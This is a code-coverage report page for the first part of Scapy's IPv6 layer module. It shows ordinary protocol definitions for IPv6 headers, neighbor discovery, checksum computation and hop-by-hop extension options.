Coverage for /pythoncovmergedfiles/medio/medio/usr/local/lib/python3.11/site-packages/scapy/layers/inet6.py: 53%

Shortcuts on this page

r m x   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

1804 statements  

1# SPDX-License-Identifier: GPL-2.0-only 

2# This file is part of Scapy 

3# See https://scapy.net/ for more information 

4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp> 

5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net> 

6 

7# Cool history about this file: http://natisbad.org/scapy/index.html 

8 

9 

10""" 

11IPv6 (Internet Protocol v6). 

12""" 

13 

14 

15from hashlib import md5 

16import random 

17import socket 

18import struct 

19from time import gmtime, strftime 

20 

21from scapy.arch import get_if_hwaddr 

22from scapy.as_resolvers import AS_resolver_riswhois 

23from scapy.base_classes import Gen, _ScopedIP 

24from scapy.compat import chb, orb, raw, plain_str, bytes_encode 

25from scapy.consts import WINDOWS 

26from scapy.config import conf 

27from scapy.data import ( 

28 DLT_IPV6, 

29 DLT_RAW, 

30 DLT_RAW_ALT, 

31 ETHER_ANY, 

32 ETH_P_ALL, 

33 ETH_P_IPV6, 

34 MTU, 

35) 

36from scapy.error import log_runtime, warning 

37from scapy.fields import ( 

38 BitEnumField, 

39 BitField, 

40 ByteEnumField, 

41 ByteField, 

42 DestIP6Field, 

43 FieldLenField, 

44 FlagsField, 

45 IntField, 

46 IP6Field, 

47 LongField, 

48 MACField, 

49 MayEnd, 

50 PacketLenField, 

51 PacketListField, 

52 ShortEnumField, 

53 ShortField, 

54 SourceIP6Field, 

55 StrField, 

56 StrFixedLenField, 

57 StrLenField, 

58 X3BytesField, 

59 XBitField, 

60 XByteField, 

61 XIntField, 

62 XShortField, 

63) 

64from scapy.layers.inet import ( 

65 _ICMPExtensionField, 

66 _ICMPExtensionPadField, 

67 _ICMP_extpad_post_dissection, 

68 IP, 

69 IPTools, 

70 TCP, 

71 TCPerror, 

72 TracerouteResult, 

73 UDP, 

74 UDPerror, 

75) 

76from scapy.layers.l2 import ( 

77 CookedLinux, 

78 Ether, 

79 GRE, 

80 Loopback, 

81 SNAP, 

82 SourceMACField, 

83) 

84from scapy.packet import bind_layers, Packet, Raw 

85from scapy.sendrecv import sendp, sniff, sr, srp1 

86from scapy.supersocket import SuperSocket 

87from scapy.utils import checksum, strxor 

88from scapy.pton_ntop import inet_pton, inet_ntop 

89from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \ 

90 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \ 

91 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo 

92from scapy.volatile import RandInt, RandShort 

93 

94# Typing 

95from typing import ( 

96 Optional, 

97) 

98 

99if not socket.has_ipv6: 

100 raise socket.error("can't use AF_INET6, IPv6 is disabled") 

101if not hasattr(socket, "IPPROTO_IPV6"): 

102 # Workaround for http://bugs.python.org/issue6926 

103 socket.IPPROTO_IPV6 = 41 

104if not hasattr(socket, "IPPROTO_IPIP"): 

105 # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 

106 socket.IPPROTO_IPIP = 4 

107 

108if conf.route6 is None: 

109 # unused import, only to initialize conf.route6 

110 import scapy.route6 # noqa: F401 

111 

112########################## 

113# Neighbor cache stuff # 

114########################## 

115 

116conf.netcache.new_cache("in6_neighbor", 120) 

117 

118 

119@conf.commands.register 

120def neighsol(addr, src, iface, timeout=1, chainCC=0): 

121 """Sends and receive an ICMPv6 Neighbor Solicitation message 

122 

123 This function sends an ICMPv6 Neighbor Solicitation message 

124 to get the MAC address of the neighbor with specified IPv6 address address. 

125 

126 'src' address is used as the source IPv6 address of the message. Message 

127 is sent on 'iface'. The source MAC address is retrieved accordingly. 

128 

129 By default, timeout waiting for an answer is 1 second. 

130 

131 If no answer is gathered, None is returned. Else, the answer is 

132 returned (ethernet frame). 

133 """ 

134 

135 nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) 

136 d = inet_ntop(socket.AF_INET6, nsma) 

137 dm = in6_getnsmac(nsma) 

138 sm = get_if_hwaddr(iface) 

139 p = Ether(dst=dm, src=sm) / IPv6(dst=d, src=src, hlim=255) 

140 p /= ICMPv6ND_NS(tgt=addr) 

141 p /= ICMPv6NDOptSrcLLAddr(lladdr=sm) 

142 res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0, 

143 chainCC=chainCC) 

144 

145 return res 

146 

147 

148@conf.commands.register 

149def getmacbyip6(ip6, chainCC=0): 

150 # type: (str, int) -> Optional[str] 

151 """ 

152 Returns the MAC address of the next hop used to reach a given IPv6 address. 

153 

154 neighborCache.get() method is used on instantiated neighbor cache. 

155 Resolution mechanism is described in associated doc string. 

156 

157 (chainCC parameter value ends up being passed to sending function 

158 used to perform the resolution, if needed) 

159 

160 .. seealso:: :func:`~scapy.layers.l2.getmacbyip` for IPv4. 

161 """ 

162 # Sanitize the IP 

163 if isinstance(ip6, Net6): 

164 ip6 = str(ip6) 

165 

166 # Multicast 

167 if in6_ismaddr(ip6): # mcast @ 

168 mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) 

169 return mac 

170 

171 iff, a, nh = conf.route6.route(ip6) 

172 

173 if iff == conf.loopback_name: 

174 return "ff:ff:ff:ff:ff:ff" 

175 

176 if nh != '::': 

177 ip6 = nh # Found next hop 

178 

179 mac = conf.netcache.in6_neighbor.get(ip6) 

180 if mac: 

181 return mac 

182 

183 res = neighsol(ip6, a, iff, chainCC=chainCC) 

184 

185 if res is not None: 

186 if ICMPv6NDOptDstLLAddr in res: 

187 mac = res[ICMPv6NDOptDstLLAddr].lladdr 

188 else: 

189 mac = res.src 

190 conf.netcache.in6_neighbor[ip6] = mac 

191 return mac 

192 

193 return None 

194 

195 

196############################################################################# 

197############################################################################# 

198# IPv6 Class # 

199############################################################################# 

200############################################################################# 

201 

202ipv6nh = {0: "Hop-by-Hop Option Header", 

203 4: "IP", 

204 6: "TCP", 

205 17: "UDP", 

206 41: "IPv6", 

207 43: "Routing Header", 

208 44: "Fragment Header", 

209 47: "GRE", 

210 50: "ESP Header", 

211 51: "AH Header", 

212 58: "ICMPv6", 

213 59: "No Next Header", 

214 60: "Destination Option Header", 

215 112: "VRRP", 

216 132: "SCTP", 

217 135: "Mobility Header"} 

218 

219ipv6nhcls = {0: "IPv6ExtHdrHopByHop", 

220 4: "IP", 

221 6: "TCP", 

222 17: "UDP", 

223 43: "IPv6ExtHdrRouting", 

224 44: "IPv6ExtHdrFragment", 

225 50: "ESP", 

226 51: "AH", 

227 58: "ICMPv6Unknown", 

228 59: "Raw", 

229 60: "IPv6ExtHdrDestOpt"} 

230 

231 

232class IP6ListField(StrField): 

233 __slots__ = ["count_from", "length_from"] 

234 islist = 1 

235 

236 def __init__(self, name, default, count_from=None, length_from=None): 

237 if default is None: 

238 default = [] 

239 StrField.__init__(self, name, default) 

240 self.count_from = count_from 

241 self.length_from = length_from 

242 

243 def i2len(self, pkt, i): 

244 return 16 * len(i) 

245 

246 def i2count(self, pkt, i): 

247 if isinstance(i, list): 

248 return len(i) 

249 return 0 

250 

251 def getfield(self, pkt, s): 

252 c = tmp_len = None 

253 if self.length_from is not None: 

254 tmp_len = self.length_from(pkt) 

255 elif self.count_from is not None: 

256 c = self.count_from(pkt) 

257 

258 lst = [] 

259 ret = b"" 

260 remain = s 

261 if tmp_len is not None: 

262 remain, ret = s[:tmp_len], s[tmp_len:] 

263 while remain: 

264 if c is not None: 

265 if c <= 0: 

266 break 

267 c -= 1 

268 addr = inet_ntop(socket.AF_INET6, remain[:16]) 

269 lst.append(addr) 

270 remain = remain[16:] 

271 return remain + ret, lst 

272 

273 def i2m(self, pkt, x): 

274 s = b"" 

275 for y in x: 

276 try: 

277 y = inet_pton(socket.AF_INET6, y) 

278 except Exception: 

279 y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] 

280 y = inet_pton(socket.AF_INET6, y) 

281 s += y 

282 return s 

283 

284 def i2repr(self, pkt, x): 

285 s = [] 

286 if x is None: 

287 return "[]" 

288 for y in x: 

289 s.append('%s' % y) 

290 return "[ %s ]" % (", ".join(s)) 

291 

292 

293class _IPv6GuessPayload: 

294 name = "Dummy class that implements guess_payload_class() for IPv6" 

295 

296 def default_payload_class(self, p): 

297 if self.nh == 58: # ICMPv6 

298 t = orb(p[0]) 

299 if len(p) > 2 and (t == 139 or t == 140): # Node Info Query 

300 return _niquery_guesser(p) 

301 if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501 

302 if t == 130 and len(p) >= 28: 

303 # RFC 3810 - 8.1. Query Version Distinctions 

304 return ICMPv6MLQuery2 

305 return icmp6typescls.get(t, Raw) 

306 return Raw 

307 elif self.nh == 135 and len(p) > 3: # Mobile IPv6 

308 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic) 

309 elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header 

310 return IPv6ExtHdrSegmentRouting 

311 return ipv6nhcls.get(self.nh, Raw) 

312 

313 

314class IPv6(_IPv6GuessPayload, Packet, IPTools): 

315 name = "IPv6" 

316 fields_desc = [BitField("version", 6, 4), 

317 BitField("tc", 0, 8), 

318 BitField("fl", 0, 20), 

319 ShortField("plen", None), 

320 ByteEnumField("nh", 59, ipv6nh), 

321 ByteField("hlim", 64), 

322 SourceIP6Field("src"), 

323 DestIP6Field("dst", "::1")] 

324 

325 def route(self): 

326 """Used to select the L2 address""" 

327 dst = self.dst 

328 scope = None 

329 if isinstance(dst, (Net6, _ScopedIP)): 

330 scope = dst.scope 

331 if isinstance(dst, (Gen, list)): 

332 dst = next(iter(dst)) 

333 return conf.route6.route(dst, dev=scope) 

334 

335 def mysummary(self): 

336 return "%s > %s (%i)" % (self.src, self.dst, self.nh) 

337 

338 def post_build(self, p, pay): 

339 p += pay 

340 if self.plen is None: 

341 tmp_len = len(p) - 40 

342 p = p[:4] + struct.pack("!H", tmp_len) + p[6:] 

343 return p 

344 

345 def extract_padding(self, data): 

346 """Extract the IPv6 payload""" 

347 

348 if self.plen == 0 and self.nh == 0 and len(data) >= 8: 

349 # Extract Hop-by-Hop extension length 

350 hbh_len = orb(data[1]) 

351 hbh_len = 8 + hbh_len * 8 

352 

353 # Extract length from the Jumbogram option 

354 # Note: the following algorithm take advantage of the Jumbo option 

355 # mandatory alignment (4n + 2, RFC2675 Section 2) 

356 jumbo_len = None 

357 idx = 0 

358 offset = 4 * idx + 2 

359 while offset <= len(data): 

360 opt_type = orb(data[offset]) 

361 if opt_type == 0xc2: # Jumbo option 

362 jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501 

363 break 

364 offset = 4 * idx + 2 

365 idx += 1 

366 

367 if jumbo_len is None: 

368 log_runtime.info("Scapy did not find a Jumbo option") 

369 jumbo_len = 0 

370 

371 tmp_len = hbh_len + jumbo_len 

372 else: 

373 tmp_len = self.plen 

374 

375 return data[:tmp_len], data[tmp_len:] 

376 

377 def hashret(self): 

378 if self.nh == 58 and isinstance(self.payload, _ICMPv6): 

379 if self.payload.type < 128: 

380 return self.payload.payload.hashret() 

381 elif (self.payload.type in [133, 134, 135, 136, 144, 145]): 

382 return struct.pack("B", self.nh) + self.payload.hashret() 

383 

384 if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6 

385 return self.payload.hashret() 

386 

387 nh = self.nh 

388 sd = self.dst 

389 ss = self.src 

390 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): 

391 # With routing header, the destination is the last 

392 # address of the IPv6 list if segleft > 0 

393 nh = self.payload.nh 

394 try: 

395 sd = self.addresses[-1] 

396 except IndexError: 

397 sd = '::1' 

398 # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501 

399 # could be anything from the original list ... 

400 if 1: 

401 sd = inet_pton(socket.AF_INET6, sd) 

402 for a in self.addresses: 

403 a = inet_pton(socket.AF_INET6, a) 

404 sd = strxor(sd, a) 

405 sd = inet_ntop(socket.AF_INET6, sd) 

406 

407 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 

408 # With segment routing header (rh == 4), the destination is 

409 # the first address of the IPv6 addresses list 

410 try: 

411 sd = self.addresses[0] 

412 except IndexError: 

413 sd = self.dst 

414 

415 if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): 

416 nh = self.payload.nh 

417 

418 if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): 

419 nh = self.payload.nh 

420 

421 if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): 

422 foundhao = None 

423 for o in self.payload.options: 

424 if isinstance(o, HAO): 

425 foundhao = o 

426 if foundhao: 

427 ss = foundhao.hoa 

428 nh = self.payload.nh # XXX what if another extension follows ? 

429 

430 if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): 

431 sd = inet_pton(socket.AF_INET6, sd) 

432 ss = inet_pton(socket.AF_INET6, ss) 

433 return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501 

434 else: 

435 return struct.pack("B", nh) + self.payload.hashret() 

436 

437 def answers(self, other): 

438 if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP 

439 if self.nh in [4, 41]: 

440 return self.payload.answers(other) 

441 if isinstance(other, IPv6) and other.nh in [4, 41]: 

442 return self.answers(other.payload) 

443 if isinstance(other, IP) and other.proto in [4, 41]: 

444 return self.answers(other.payload) 

445 if not isinstance(other, IPv6): # self is reply, other is request 

446 return False 

447 if conf.checkIPaddr: 

448 # ss = inet_pton(socket.AF_INET6, self.src) 

449 sd = inet_pton(socket.AF_INET6, self.dst) 

450 os = inet_pton(socket.AF_INET6, other.src) 

451 od = inet_pton(socket.AF_INET6, other.dst) 

452 # request was sent to a multicast address (other.dst) 

453 # Check reply destination addr matches request source addr (i.e 

454 # sd == os) except when reply is multicasted too 

455 # XXX test mcast scope matching ? 

456 if in6_ismaddr(other.dst): 

457 if in6_ismaddr(self.dst): 

458 if ((od == sd) or 

459 (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501 

460 return self.payload.answers(other.payload) 

461 return False 

462 if (os == sd): 

463 return self.payload.answers(other.payload) 

464 return False 

465 elif (sd != os): # or ss != od): <- removed for ICMP errors 

466 return False 

467 if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501 

468 # ICMPv6 Error message -> generated by IPv6 packet 

469 # Note : at the moment, we jump the ICMPv6 specific class 

470 # to call answers() method of erroneous packet (over 

471 # initial packet). There can be cases where an ICMPv6 error 

472 # class could implement a specific answers method that perform 

473 # a specific task. Currently, don't see any use ... 

474 return self.payload.payload.answers(other) 

475 elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): 

476 return self.payload.answers(other.payload) 

477 elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): 

478 return self.payload.answers(other.payload.payload) 

479 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): 

480 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 

481 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 

482 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 

483 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): 

484 return self.payload.answers(other.payload.payload) 

485 elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501 

486 return self.payload.payload.answers(other.payload) 

487 else: 

488 if (self.nh != other.nh): 

489 return False 

490 return self.payload.answers(other.payload) 

491 

492 

493class IPv46(IP, IPv6): 

494 """ 

495 This class implements a dispatcher that is used to detect the IP version 

496 while parsing Raw IP pcap files. 

497 """ 

498 name = "IPv4/6" 

499 

500 @classmethod 

501 def dispatch_hook(cls, _pkt=None, *_, **kargs): 

502 if _pkt: 

503 if orb(_pkt[0]) >> 4 == 6: 

504 return IPv6 

505 elif kargs.get("version") == 6: 

506 return IPv6 

507 return IP 

508 

509 

510def inet6_register_l3(l2, l3): 

511 """ 

512 Resolves the default L2 destination address when IPv6 is used. 

513 """ 

514 return getmacbyip6(l3.dst) 

515 

516 

517conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3) 

518 

519 

520class IPerror6(IPv6): 

521 name = "IPv6 in ICMPv6" 

522 

523 def answers(self, other): 

524 if not isinstance(other, IPv6): 

525 return False 

526 sd = inet_pton(socket.AF_INET6, self.dst) 

527 ss = inet_pton(socket.AF_INET6, self.src) 

528 od = inet_pton(socket.AF_INET6, other.dst) 

529 os = inet_pton(socket.AF_INET6, other.src) 

530 

531 # Make sure that the ICMPv6 error is related to the packet scapy sent 

532 if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: 

533 

534 # find upper layer for self (possible citation) 

535 selfup = self.payload 

536 while selfup is not None and isinstance(selfup, _IPv6ExtHdr): 

537 selfup = selfup.payload 

538 

539 # find upper layer for other (initial packet). Also look for RH 

540 otherup = other.payload 

541 request_has_rh = False 

542 while otherup is not None and isinstance(otherup, _IPv6ExtHdr): 

543 if isinstance(otherup, IPv6ExtHdrRouting): 

544 request_has_rh = True 

545 otherup = otherup.payload 

546 

547 if ((ss == os and sd == od) or # < Basic case 

548 (ss == os and request_has_rh)): 

549 # ^ Request has a RH : don't check dst address 

550 

551 # Let's deal with possible MSS Clamping 

552 if (isinstance(selfup, TCP) and 

553 isinstance(otherup, TCP) and 

554 selfup.options != otherup.options): # seems clamped 

555 

556 # Save fields modified by MSS clamping 

557 old_otherup_opts = otherup.options 

558 old_otherup_cksum = otherup.chksum 

559 old_otherup_dataofs = otherup.dataofs 

560 old_selfup_opts = selfup.options 

561 old_selfup_cksum = selfup.chksum 

562 old_selfup_dataofs = selfup.dataofs 

563 

564 # Nullify them 

565 otherup.options = [] 

566 otherup.chksum = 0 

567 otherup.dataofs = 0 

568 selfup.options = [] 

569 selfup.chksum = 0 

570 selfup.dataofs = 0 

571 

572 # Test it and save result 

573 s1 = raw(selfup) 

574 s2 = raw(otherup) 

575 tmp_len = min(len(s1), len(s2)) 

576 res = s1[:tmp_len] == s2[:tmp_len] 

577 

578 # recall saved values 

579 otherup.options = old_otherup_opts 

580 otherup.chksum = old_otherup_cksum 

581 otherup.dataofs = old_otherup_dataofs 

582 selfup.options = old_selfup_opts 

583 selfup.chksum = old_selfup_cksum 

584 selfup.dataofs = old_selfup_dataofs 

585 

586 return res 

587 

588 s1 = raw(selfup) 

589 s2 = raw(otherup) 

590 tmp_len = min(len(s1), len(s2)) 

591 return s1[:tmp_len] == s2[:tmp_len] 

592 

593 return False 

594 

595 def mysummary(self): 

596 return Packet.mysummary(self) 

597 

598 

599############################################################################# 

600############################################################################# 

601# Upper Layer Checksum computation # 

602############################################################################# 

603############################################################################# 

604 

605class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation 

606 name = "Pseudo IPv6 Header" 

607 fields_desc = [IP6Field("src", "::"), 

608 IP6Field("dst", "::"), 

609 IntField("uplen", None), 

610 BitField("zero", 0, 24), 

611 ByteField("nh", 0)] 

612 

613 

614def in6_pseudoheader(nh, u, plen): 

615 # type: (int, IP, int) -> PseudoIPv6 

616 """ 

617 Build an PseudoIPv6 instance as specified in RFC 2460 8.1 

618 

619 This function operates by filling a pseudo header class instance 

620 (PseudoIPv6) with: 

621 - Next Header value 

622 - the address of _final_ destination (if some Routing Header with non 

623 segleft field is present in underlayer classes, last address is used.) 

624 - the address of _real_ source (basically the source address of an 

625 IPv6 class instance available in the underlayer or the source address 

626 in HAO option if some Destination Option header found in underlayer 

627 includes this option). 

628 - the length is the length of provided payload string ('p') 

629 

630 :param nh: value of upper layer protocol 

631 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be 

632 provided with all under layers (IPv6 and all extension headers, 

633 for example) 

634 :param plen: the length of the upper layer and payload 

635 """ 

636 ph6 = PseudoIPv6() 

637 ph6.nh = nh 

638 rthdr = 0 

639 hahdr = 0 

640 final_dest_addr_found = 0 

641 while u is not None and not isinstance(u, IPv6): 

642 if (isinstance(u, IPv6ExtHdrRouting) and 

643 u.segleft != 0 and len(u.addresses) != 0 and 

644 final_dest_addr_found == 0): 

645 rthdr = u.addresses[-1] 

646 final_dest_addr_found = 1 

647 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and 

648 u.segleft != 0 and len(u.addresses) != 0 and 

649 final_dest_addr_found == 0): 

650 rthdr = u.addresses[0] 

651 final_dest_addr_found = 1 

652 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and 

653 isinstance(u.options[0], HAO)): 

654 hahdr = u.options[0].hoa 

655 u = u.underlayer 

656 if u is None: 

657 warning("No IPv6 underlayer to compute checksum. Leaving null.") 

658 return None 

659 if hahdr: 

660 ph6.src = hahdr 

661 else: 

662 ph6.src = u.src 

663 if rthdr: 

664 ph6.dst = rthdr 

665 else: 

666 ph6.dst = u.dst 

667 ph6.uplen = plen 

668 return ph6 

669 

670 

671def in6_chksum(nh, u, p): 

672 """ 

673 As Specified in RFC 2460 - 8.1 Upper-Layer Checksums 

674 

675 See also `.in6_pseudoheader` 

676 

677 :param nh: value of upper layer protocol 

678 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be 

679 provided with all under layers (IPv6 and all extension headers, 

680 for example) 

681 :param p: the payload of the upper layer provided as a string 

682 """ 

683 ph6 = in6_pseudoheader(nh, u, len(p)) 

684 if ph6 is None: 

685 return 0 

686 ph6s = raw(ph6) 

687 return checksum(ph6s + p) 

688 

689 

690############################################################################# 

691############################################################################# 

692# Extension Headers # 

693############################################################################# 

694############################################################################# 

695 

696 

697# Inherited by all extension header classes 

698class _IPv6ExtHdr(_IPv6GuessPayload, Packet): 

699 name = 'Abstract IPv6 Option Header' 

700 aliastypes = [IPv6, IPerror6] # TODO ... 

701 

702 

703# IPv6 options for Extension Headers # 

704 

705_hbhopts = {0x00: "Pad1", 

706 0x01: "PadN", 

707 0x04: "Tunnel Encapsulation Limit", 

708 0x05: "Router Alert", 

709 0x06: "Quick-Start", 

710 0xc2: "Jumbo Payload", 

711 0xc9: "Home Address Option"} 

712 

713 

714class _OTypeField(ByteEnumField): 

715 """ 

716 Modified BytEnumField that displays information regarding the IPv6 option 

717 based on its option type value (What should be done by nodes that process 

718 the option if they do not understand it ...) 

719 

720 It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options 

721 """ 

722 pol = {0x00: "00: skip", 

723 0x40: "01: discard", 

724 0x80: "10: discard+ICMP", 

725 0xC0: "11: discard+ICMP not mcast"} 

726 

727 enroutechange = {0x00: "0: Don't change en-route", 

728 0x20: "1: May change en-route"} 

729 

730 def i2repr(self, pkt, x): 

731 s = self.i2s.get(x, repr(x)) 

732 polstr = self.pol[(x & 0xC0)] 

733 enroutechangestr = self.enroutechange[(x & 0x20)] 

734 return "%s [%s, %s]" % (s, polstr, enroutechangestr) 

735 

736 

737class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option 

738 name = "Scapy6 Unknown Option" 

739 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 

740 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 

741 StrLenField("optdata", "", 

742 length_from=lambda pkt: pkt.optlen)] 

743 

744 def alignment_delta(self, curpos): # By default, no alignment requirement 

745 """ 

746 As specified in section 4.2 of RFC 2460, every options has 

747 an alignment requirement usually expressed xn+y, meaning 

748 the Option Type must appear at an integer multiple of x octets 

749 from the start of the header, plus y octets. 

750 

751 That function is provided the current position from the 

752 start of the header and returns required padding length. 

753 """ 

754 return 0 

755 

756 @classmethod 

757 def dispatch_hook(cls, _pkt=None, *args, **kargs): 

758 if _pkt: 

759 o = orb(_pkt[0]) # Option type 

760 if o in _hbhoptcls: 

761 return _hbhoptcls[o] 

762 return cls 

763 

764 def extract_padding(self, p): 

765 return b"", p 

766 

767 

768class Pad1(Packet): # IPv6 Hop-By-Hop Option 

769 name = "Pad1" 

770 fields_desc = [_OTypeField("otype", 0x00, _hbhopts)] 

771 

772 def alignment_delta(self, curpos): # No alignment requirement 

773 return 0 

774 

775 def extract_padding(self, p): 

776 return b"", p 

777 

778 

779class PadN(Packet): # IPv6 Hop-By-Hop Option 

780 name = "PadN" 

781 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 

782 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 

783 StrLenField("optdata", "", 

784 length_from=lambda pkt: pkt.optlen)] 

785 

786 def alignment_delta(self, curpos): # No alignment requirement 

787 return 0 

788 

789 def extract_padding(self, p): 

790 return b"", p 

791 

792 

793class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option 

794 name = "Router Alert" 

795 fields_desc = [_OTypeField("otype", 0x05, _hbhopts), 

796 ByteField("optlen", 2), 

797 ShortEnumField("value", None, 

798 {0: "Datagram contains a MLD message", 

799 1: "Datagram contains RSVP message", 

800 2: "Datagram contains an Active Network message", # noqa: E501 

801 68: "NSIS NATFW NSLP", 

802 69: "MPLS OAM", 

803 65535: "Reserved"})] 

804 # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501 

805 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501 

806 # TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501 

807 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml 

808 

809 def alignment_delta(self, curpos): # alignment requirement : 2n+0 

810 x = 2 

811 y = 0 

812 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

813 return delta 

814 

815 def extract_padding(self, p): 

816 return b"", p 

817 

818 

819class RplOption(Packet): # RFC 6553 - RPL Option 

820 name = "RPL Option" 

821 fields_desc = [_OTypeField("otype", 0x63, _hbhopts), 

822 ByteField("optlen", 4), 

823 BitField("Down", 0, 1), 

824 BitField("RankError", 0, 1), 

825 BitField("ForwardError", 0, 1), 

826 BitField("unused", 0, 5), 

827 XByteField("RplInstanceId", 0), 

828 XShortField("SenderRank", 0)] 

829 

830 def alignment_delta(self, curpos): # alignment requirement : 2n+0 

831 x = 2 

832 y = 0 

833 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

834 return delta 

835 

836 def extract_padding(self, p): 

837 return b"", p 

838 

839 

840class Jumbo(Packet): # IPv6 Hop-By-Hop Option 

841 name = "Jumbo Payload" 

842 fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), 

843 ByteField("optlen", 4), 

844 IntField("jumboplen", None)] 

845 

846 def alignment_delta(self, curpos): # alignment requirement : 4n+2 

847 x = 4 

848 y = 2 

849 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

850 return delta 

851 

852 def extract_padding(self, p): 

853 return b"", p 

854 

855 

856class HAO(Packet): # IPv6 Destination Options Header Option 

857 name = "Home Address Option" 

858 fields_desc = [_OTypeField("otype", 0xC9, _hbhopts), 

859 ByteField("optlen", 16), 

860 IP6Field("hoa", "::")] 

861 

862 def alignment_delta(self, curpos): # alignment requirement : 8n+6 

863 x = 8 

864 y = 6 

865 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

866 return delta 

867 

868 def extract_padding(self, p): 

869 return b"", p 

870 

871 

872_hbhoptcls = {0x00: Pad1, 

873 0x01: PadN, 

874 0x05: RouterAlert, 

875 0x63: RplOption, 

876 0xC2: Jumbo, 

877 0xC9: HAO} 

878 

879 

880# Hop-by-Hop Extension Header # 

881 

882class _OptionsField(PacketListField): 

883 __slots__ = ["curpos"] 

884 

885 def __init__(self, name, default, cls, curpos, *args, **kargs): 

886 self.curpos = curpos 

887 PacketListField.__init__(self, name, default, cls, *args, **kargs) 

888 

889 def i2len(self, pkt, i): 

890 return len(self.i2m(pkt, i)) 

891 

892 def i2m(self, pkt, x): 

893 autopad = None 

894 try: 

895 autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field 

896 except Exception: 

897 autopad = 1 

898 

899 if not autopad: 

900 return b"".join(map(bytes, x)) 

901 

902 curpos = self.curpos 

903 s = b"" 

904 for p in x: 

905 d = p.alignment_delta(curpos) 

906 curpos += d 

907 if d == 1: 

908 s += raw(Pad1()) 

909 elif d != 0: 

910 s += raw(PadN(optdata=b'\x00' * (d - 2))) 

911 pstr = raw(p) 

912 curpos += len(pstr) 

913 s += pstr 

914 

915 # Let's make the class including our option field 

916 # a multiple of 8 octets long 

917 d = curpos % 8 

918 if d == 0: 

919 return s 

920 d = 8 - d 

921 if d == 1: 

922 s += raw(Pad1()) 

923 elif d != 0: 

924 s += raw(PadN(optdata=b'\x00' * (d - 2))) 

925 

926 return s 

927 

928 def addfield(self, pkt, s, val): 

929 return s + self.i2m(pkt, val) 

930 

931 

932class _PhantomAutoPadField(ByteField): 

933 def addfield(self, pkt, s, val): 

934 return s 

935 

936 def getfield(self, pkt, s): 

937 return s, 1 

938 

939 def i2repr(self, pkt, x): 

940 if x: 

941 return "On" 

942 return "Off" 

943 

944 

945class IPv6ExtHdrHopByHop(_IPv6ExtHdr): 

946 name = "IPv6 Extension Header - Hop-by-Hop Options Header" 

947 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

948 FieldLenField("len", None, length_of="options", fmt="B", 

949 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), 

950 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

951 _OptionsField("options", [], HBHOptUnknown, 2, 

952 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 

